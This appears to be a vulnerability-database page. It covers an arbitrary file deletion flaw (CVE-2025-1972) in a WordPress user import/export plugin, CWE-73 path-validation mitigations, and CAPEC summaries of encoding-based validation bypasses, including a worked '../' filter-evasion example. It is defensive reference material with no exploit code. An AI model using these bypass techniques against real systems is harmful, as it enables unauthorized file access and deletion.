"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8fe1609d-17d6-4afe-90b2-5473dc9b6c3b?source=cve"
},
{
"type": "WEB",
"url": "https://www.wpbot.pro"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-HJX4-8932-9CPQ
Vulnerability from github – Published: 2025-03-22 12:30 – Updated: 2025-03-22 12:30The Export and Import Users and Customers plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.6.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.
{
"affected": [],
"aliases": [
"CVE-2025-1972"
],
"database_specific": {
"cwe_ids": [
"CWE-73"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-22T12:15:26Z",
"severity": "LOW"
},
"details": "The Export and Import Users and Customers plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the admin_log_page() function in all versions up to, and including, 2.6.2. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary log files on the server.",
"id": "GHSA-hjx4-8932-9cpq",
"modified": "2025-03-22T12:30:22Z",
"published": "2025-03-22T12:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1972"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/users-customers-import-export-for-wp-woocommerce/trunk/admin/modules/history/history.php#L248"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3259688"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/users-customers-import-export-for-wp-woocommerce/#developers"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2d443c70-6537-4c6d-a282-12d392f0f558?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.
Mitigation
- Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.
- Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation
Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59).
Mitigation
Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack.
Mitigation
If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.
Mitigation
Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.
CAPEC-13: Subverting Environment Variable Values
The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.
CAPEC-267: Leverage Alternate Encoding
An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.
CAPEC-64: Using Slashes and URL Encoding Combined to Bypass Validation Logic
This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.
CAPEC-72: URL Encoding
This attack targets the encoding of the URL. An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.
CAPEC-78: Using Escaped Slashes in Alternate Encoding
This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.
CAPEC-79: Using Slashes in Alternate Encoding
This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. The goal of this pattern is to discover server software that only applies filters to one version, but not the other.
CAPEC-80: Using UTF-8 Encoding to Bypass Validation Logic
This attack is a specific variation on leveraging alternate encodings to bypass validation logic. This attack leverages the possibility to encode potentially harmful input in UTF-8 and submit it to applications not expecting or effective at validating this encoding standard making input filtering difficult. UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. Legal UTF-8 characters are one to four bytes long. However, early version of the UTF-8 specification got some entries wrong (in some cases it permitted overlong characters). UTF-8 encoders are supposed to use the "shortest possible" encoding, but naive decoders may accept encodings that are longer than necessary. According to the RFC 3629, a particularly subtle form of this attack can be carried out against a parser which performs security-critical validity checks against the UTF-8 encoded form of its input, but interprets certain illegal octet sequences as characters.